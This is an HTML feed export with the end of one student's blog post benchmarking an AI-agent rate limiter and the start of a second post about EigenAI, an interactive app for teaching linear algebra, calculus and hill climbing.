&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;503.91 req/s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Single endpoint hammering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mean Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;99.22ms&lt;/td&gt;
&lt;td&gt;Single-agent bottleneck scenario&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;P95 Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;129ms&lt;/td&gt;
&lt;td&gt;95th percentile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;P99 Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;139ms&lt;/td&gt;
&lt;td&gt;99th percentile&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate Limited&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;88.1%&lt;/td&gt;
&lt;td&gt;Single agent hitting limit (expected)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why the difference?&lt;/strong&gt; Apache Bench used a single agent ID (worst-case bottleneck), while k6 distributed load across 10,000 agents (realistic scenario). The k6 test is more representative of production traffic.&lt;/p&gt;

&lt;h4&gt;
  
  
  Architectural Projections (Targets to Validate)
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;⚠️ Note:&lt;/strong&gt; The scaling estimates below are &lt;strong&gt;architectural projections&lt;/strong&gt; based on validated single-instance performance (381 req/s). These represent targets assuming linear scaling, not yet validated with actual multi-instance deployments.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Instances&lt;/th&gt;
&lt;th&gt;Projected Throughput&lt;/th&gt;
&lt;th&gt;Projected Concurrent Agents&lt;/th&gt;
&lt;th&gt;Validation Status&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;1 instance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;381 req/s&lt;/td&gt;
&lt;td&gt;10,000+&lt;/td&gt;
&lt;td&gt;✅ Validated&lt;/td&gt;
&lt;td&gt;Development, small production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;3 instances&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~1,100 req/s&lt;/td&gt;
&lt;td&gt;30,000+&lt;/td&gt;
&lt;td&gt;Pending validation&lt;/td&gt;
&lt;td&gt;Medium production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;5 instances&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~1,900 req/s&lt;/td&gt;
&lt;td&gt;50,000+&lt;/td&gt;
&lt;td&gt;Pending validation&lt;/td&gt;
&lt;td&gt;Large production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;10 instances&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~3,800 req/s&lt;/td&gt;
&lt;td&gt;100,000+&lt;/td&gt;
&lt;td&gt;Pending validation&lt;/td&gt;
&lt;td&gt;Enterprise scale&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Scaling Infrastructure:&lt;/strong&gt; Load balancer + Redis Cluster + Kubernetes auto-scaling&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;📊 &lt;strong&gt;&lt;a href="https://github.com/lfariabr/intelligent-rate-limiter/blob/master/benchmarks/REAL_RESULTS.md" rel="noopener noreferrer"&gt;View Complete Validated Results&lt;/a&gt;&lt;/strong&gt; – Actual measured performance from k6 and Apache Bench testing&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h3&gt;
  
  
  Economic Impact
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Cost Reduction:&lt;/strong&gt; 60-75% for runaway spend scenarios&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Reduction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Infinite loop prevention&lt;/td&gt;
&lt;td&gt;40%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Redundant call elimination&lt;/td&gt;
&lt;td&gt;15%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Query optimization&lt;/td&gt;
&lt;td&gt;10%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hard caps on catastrophic spend&lt;/td&gt;
&lt;td&gt;Prevents $15k-$25k overnight&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Real-world validation:&lt;/strong&gt; Pilot deployment avoided &lt;strong&gt;3 billing catastrophes&lt;/strong&gt; in the first month—each would have exceeded $20,000.&lt;/p&gt;




&lt;h3&gt;
  
  
  Environmental Impact
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Carbon Footprint Reduction:&lt;/strong&gt; 25-35%&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deployment Size&lt;/th&gt;
&lt;th&gt;CO₂ Saved/Month&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Small (10 agents)&lt;/td&gt;
&lt;td&gt;80 kg&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Medium (100 agents)&lt;/td&gt;
&lt;td&gt;800 kg&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise (1,000 agents)&lt;/td&gt;
&lt;td&gt;8,000 kg&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;At 1,000-org scale&lt;/td&gt;
&lt;td&gt;9,600 tonnes/year&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context:&lt;/strong&gt; 9,600 tonnes/year = &lt;strong&gt;2,000 cars off the road&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  📚 Academic Backbone
&lt;/h2&gt;

&lt;p&gt;This wasn't just a "build cool tech" project. Every design decision is grounded in peer-reviewed research.&lt;/p&gt;

&lt;h3&gt;
  
  
  17+ Academic References
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Amershi et al. (2019):&lt;/strong&gt; 18 Guidelines for Human-AI Interaction&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Miller (2019):&lt;/strong&gt; Contrastive explanations boost trust in AI systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Binns et al. (2018):&lt;/strong&gt; Procedural transparency improves fairness perception&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Strubell et al. (2019):&lt;/strong&gt; Energy costs of deep learning in NLP&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Wiesner et al. (2023):&lt;/strong&gt; Temporal workload shifting reduces emissions 15-30%&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hofstede (2011):&lt;/strong&gt; Cultural dimensions theory for fairness models&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dignum (2019):&lt;/strong&gt; Responsible Artificial Intelligence framework&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Green Software Foundation (2023):&lt;/strong&gt; Carbon-Aware SDK methodology&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  8 of Amershi's 18 Guidelines Implemented
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Guideline&lt;/th&gt;
&lt;th&gt;IRL Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;G2: Make clear what the system can do&lt;/td&gt;
&lt;td&gt;Dashboard shows exact quotas&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G7: Support efficient invocation&lt;/td&gt;
&lt;td&gt;One-click override buttons&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G8: Support efficient dismissal&lt;/td&gt;
&lt;td&gt;Skip/defer low-priority tasks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G10: Mitigate social biases&lt;/td&gt;
&lt;td&gt;Culturally adaptive fairness&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G12: Learn from user behavior&lt;/td&gt;
&lt;td&gt;Adaptive quotas&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G15: Encourage granular feedback&lt;/td&gt;
&lt;td&gt;Appeal workflows&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G16: Convey consequences&lt;/td&gt;
&lt;td&gt;Carbon/cost projections&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G18: Provide global controls&lt;/td&gt;
&lt;td&gt;Admin overrides with audit&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  💥 Key Insights
&lt;/h2&gt;

&lt;p&gt;This project transformed my understanding of AI governance:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;"Rate limiting is a backend concern"&lt;/td&gt;
&lt;td&gt;Rate limiting is a &lt;strong&gt;human-centered design&lt;/strong&gt; problem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"HTTP 429 is enough"&lt;/td&gt;
&lt;td&gt;Contrastive explanations build trust and reduce frustration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Fairness = equal limits"&lt;/td&gt;
&lt;td&gt;Fairness = &lt;strong&gt;equity&lt;/strong&gt; adjusted for context (Hofstede)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Carbon is someone else's problem"&lt;/td&gt;
&lt;td&gt;Carbon-aware scheduling is &lt;strong&gt;table stakes&lt;/strong&gt; for responsible AI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Accountability is abstract"&lt;/td&gt;
&lt;td&gt;Immutable logs make accountability &lt;strong&gt;concrete and auditable&lt;/strong&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  What's Next for IRL?
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q1 2026:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Open beta with 5-10 early adopter organizations&lt;/li&gt;
&lt;li&gt;Integration guides for LangChain, AutoGPT, CrewAI&lt;/li&gt;
&lt;li&gt;Kubernetes Helm charts for one-command deployment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Q2 2026:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Empirical validation study (aiming for CHI or FAccT 2026)&lt;/li&gt;
&lt;li&gt;GDPR/SOC2 compliance certification&lt;/li&gt;
&lt;li&gt;Multi-region carbon data providers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Q3-Q4 2026:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enterprise support tier with SLA guarantees&lt;/li&gt;
&lt;li&gt;Mobile dashboard app&lt;/li&gt;
&lt;li&gt;Plugin marketplace for custom throttling policies&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Resources
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment1/HCD402_Faria_L_Assessment_1_SlideDeck_vf.pdf" rel="noopener noreferrer"&gt;Assessment 1: AI Recommendation Systems&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment2/HCD402_Faria_L_Assessment_2.pdf" rel="noopener noreferrer"&gt;Assessment 2: Agentic AI Crisis Report&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment3/Faria_Luis_Assessment3_SystemSolution.pdf" rel="noopener noreferrer"&gt;Assessment 3: IRL System Design&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📊 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2025-T2/T2-HCD/assignments/Assessment3/Faria_Luis_Assessment3_Presentation.pdf" rel="noopener noreferrer"&gt;Assessment 3: Presentation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🤖 &lt;a href="https://github.com/lfariabr/intelligent-rate-limiter" rel="noopener noreferrer"&gt;IRL Source Code&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🌏 Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building IRL has been the perfect bridge between academic research and production engineering. If you're:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Deploying autonomous AI agents&lt;/li&gt;
&lt;li&gt;Building AI governance frameworks&lt;/li&gt;
&lt;li&gt;Passionate about sustainable computing&lt;/li&gt;
&lt;li&gt;Interested in human-centered design for ML systems&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;We're entering an era where &lt;strong&gt;AI agents will outnumber human API users&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;I built IRL because I refuse to accept a future where:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;❌ Developers wake up to surprise $50k bills&lt;/li&gt;
&lt;li&gt;❌ Environmental costs remain invisible&lt;/li&gt;
&lt;li&gt;❌ Accountability vanishes into "the algorithm did it"&lt;/li&gt;
&lt;li&gt;❌ Only well-funded enterprises can afford AI infrastructure&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The IRL system proves that innovation and responsibility aren't competing goals. They're mutually reinforcing.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Built with ☕ and TypeScript by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;br&gt;&lt;br&gt;
Student @ Torrens University Australia | HCD402 | Dec 2025&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>machinelearning</category>
      <category>node</category>
      <category>graphql</category>
    </item>
    <item>
      <title>Building EigenAI: Teaching Math Foundations of AI Through Interactive Code</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Sat, 06 Dec 2025 21:29:32 +0000</pubDate>
      <link>https://forem.com/lfariaus/building-eigenai-teaching-math-foundations-of-ai-through-interactive-code-3ni5</link>
      <guid>https://forem.com/lfariaus/building-eigenai-teaching-math-foundations-of-ai-through-interactive-code-3ni5</guid>
      <description>&lt;p&gt;&lt;strong&gt;From determinants to hill climbing algorithms—how I turned academic math into an interactive learning platform.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Whether it's concrete or code, structure is everything."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🎓 The Challenge: Making Math "Click"
&lt;/h2&gt;

&lt;p&gt;As a self-taught software engineer transitioning from 10+ years in project management, I enrolled in &lt;strong&gt;MFA501 – Mathematical Foundations of Artificial Intelligence&lt;/strong&gt; at Torrens University Australia under &lt;a href="https://au.linkedin.com/in/james-v-70183b28" rel="noopener noreferrer"&gt;Dr. James Vakilian&lt;/a&gt;. The subject covered everything from linear algebra to optimization algorithms—the mathematical backbone of modern AI applications in:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Machine Learning&lt;/strong&gt; (model training, optimization)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Natural Language Processing&lt;/strong&gt; (text embeddings, transformations)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Computer Vision&lt;/strong&gt; (image processing, feature extraction)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Speech Recognition&lt;/strong&gt; (signal processing, pattern matching)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But here's the problem: &lt;strong&gt;abstract math doesn't stick unless you build something with it.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;So instead of just solving problems on paper, I built &lt;strong&gt;&lt;a href="https://eigen-ai.streamlit.app/" rel="noopener noreferrer"&gt;EigenAI&lt;/a&gt;&lt;/strong&gt; — an interactive Streamlit app that teaches mathematical concepts through live computation, step-by-step explanations, and real-time visualizations.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Can we make eigenvalues, gradients, and hill climbing algorithms as intuitive as playing with Legos?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnzx8b9m0691khi325dlo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnzx8b9m0691khi325dlo.png" alt="Lego Wallpaper" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That question drove the entire project.&lt;/p&gt;




&lt;h2&gt;
  
  
  🤖 What Is EigenAI?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkit7ysi5jp0fjo7uy72g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkit7ysi5jp0fjo7uy72g.png" alt="EigenAI taking a coffee getting ready to teach" width="800" height="573"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;EigenAI&lt;/strong&gt; (playing on "eigenvalues" and "AI foundations") is a web-based educational platform that implements core mathematical concepts from AI foundations. It's structured around &lt;strong&gt;four assessments&lt;/strong&gt; that progressively build complexity, with the app implementing the three case study assessments (2A, 2B, 3):&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;The 12-Week Journey&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;The subject covered 12 progressive modules:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Week&lt;/th&gt;
&lt;th&gt;Topic&lt;/th&gt;
&lt;th&gt;Overview&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 1-5&lt;/td&gt;
&lt;td&gt;Linear Algebra Foundations&lt;/td&gt;
&lt;td&gt;Sets, vectors, matrices, transformations, eigenvalues&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 6-9&lt;/td&gt;
&lt;td&gt;Calculus &amp;amp; Optimization&lt;/td&gt;
&lt;td&gt;Derivatives, integrals, hill climbing, simulated annealing, genetic algorithms&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weeks 10-12&lt;/td&gt;
&lt;td&gt;Probability, Statistics &amp;amp; Logic&lt;/td&gt;
&lt;td&gt;Foundations for AI reasoning and decision-making&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Note: Module 6 taught by &lt;a href="https://www.niushashafiabady.com/" rel="noopener noreferrer"&gt;Dr. Niusha Shafiabady&lt;/a&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 1: Linear Algebra Fundamentals&lt;/strong&gt; &lt;em&gt;(Online Quiz)&lt;/em&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;✅ Matrix operations (addition, multiplication, transpose)
&lt;/li&gt;
&lt;li&gt;✅ Vector operations (magnitude, unit vectors, dot product, cross product)
&lt;/li&gt;
&lt;li&gt;✅ Systems of equations (elimination, Gaussian elimination)
&lt;/li&gt;
&lt;li&gt;✅ Linear transformations (stretching, reflection, projection)
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; 60-minute timed quiz covering Modules 1-2 foundational concepts—no coding, pure mathematical understanding.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; These fundamentals are the building blocks for understanding how data flows through neural networks and ML algorithms.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Note: Assessment 1 was a quiz-only assessment. The EigenAI app implements the three case study assessments (2A, 2B, 3) that required coding solutions.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 2A: Determinants &amp;amp; Eigenvalues&lt;/strong&gt; &lt;em&gt;(Case Study)&lt;/em&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;✅ Recursive determinant calculation for n×n matrices
&lt;/li&gt;
&lt;li&gt;✅ Eigenvalue and eigenvector computation (2×2 matrices)
&lt;/li&gt;
&lt;li&gt;✅ Step-by-step mathematical notation using SymPy
&lt;/li&gt;
&lt;li&gt;✅ Input validation and error handling
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Implement cofactor expansion from scratch—no NumPy allowed for core logic, only pure Python.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; Eigenvalues and eigenvectors are the foundation of:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PCA (Principal Component Analysis)&lt;/strong&gt; — dimensionality reduction for large datasets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Eigenfaces&lt;/strong&gt; — facial recognition algorithms&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feature compression&lt;/strong&gt; — reducing computational cost in ML models&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Understanding determinants reveals why singular matrices break these algorithms.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 2B: Calculus &amp;amp; Neural Networks&lt;/strong&gt; &lt;em&gt;(Case Study)&lt;/em&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;✅ Numerical integration (Trapezoid, Simpson's Rule, Adaptive Simpson)
&lt;/li&gt;
&lt;li&gt;✅ RRBF (Recurrent Radial Basis Function) gradient computation
&lt;/li&gt;
&lt;li&gt;✅ Manual backpropagation without TensorFlow/PyTorch
&lt;/li&gt;
&lt;li&gt;✅ Comparative analysis of integration methods with error bounds
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Compute gradients by hand for a recurrent network—feel the chain rule in your bones.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; Before using &lt;code&gt;model.fit()&lt;/code&gt;, you should understand what &lt;code&gt;.backward()&lt;/code&gt; actually does.&lt;/p&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;Assessment 3: AI Optimization Algorithms&lt;/strong&gt; &lt;em&gt;(Case Study)&lt;/em&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;✅ Hill Climbing algorithm for binary image reconstruction
&lt;/li&gt;
&lt;li&gt;✅ Stochastic sampling variant (speed vs. accuracy trade-off)
&lt;/li&gt;
&lt;li&gt;✅ Pattern complexity selector (simple vs. complex cost landscapes)
&lt;/li&gt;
&lt;li&gt;✅ Real-time cost progression visualization
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Challenge:&lt;/strong&gt; Reconstruct a 10×10 binary image from random noise using only local search—no global optimization, no backtracking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why It Matters:&lt;/strong&gt; Hill climbing is the foundation of gradient descent, simulated annealing, and evolutionary algorithms. If you understand local optima here, you understand why neural networks get stuck.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💡 Key Insight from Module 6 (&lt;a href="https://www.niushashafiabady.com/" rel="noopener noreferrer"&gt;Dr. Niusha Shafiabady&lt;/a&gt;):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hill climbing can get stuck in local optima with no guarantee of finding the global optimum. The cure?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Random restarts&lt;/strong&gt; (try multiple starting points)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Random mutations&lt;/strong&gt; (introduce noise)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Probabilistic acceptance&lt;/strong&gt; (simulated annealing)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This limitation explains why modern AI uses ensemble methods and stochastic optimization.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🗓️ Project Timeline &amp;amp; Results
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Month&lt;/th&gt;
&lt;th&gt;Assessment&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;October 2025&lt;/td&gt;
&lt;td&gt;Linear Algebra Quiz&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;72.5% (C)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;October 2025&lt;/td&gt;
&lt;td&gt;Determinants &amp;amp; Eigenvalues&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;82% (D)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;November 2025&lt;/td&gt;
&lt;td&gt;Integrals &amp;amp; RRBF&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;84% (D)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;December 2025&lt;/td&gt;
&lt;td&gt;Hill Climbing&lt;/td&gt;
&lt;td&gt;Awaiting results&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

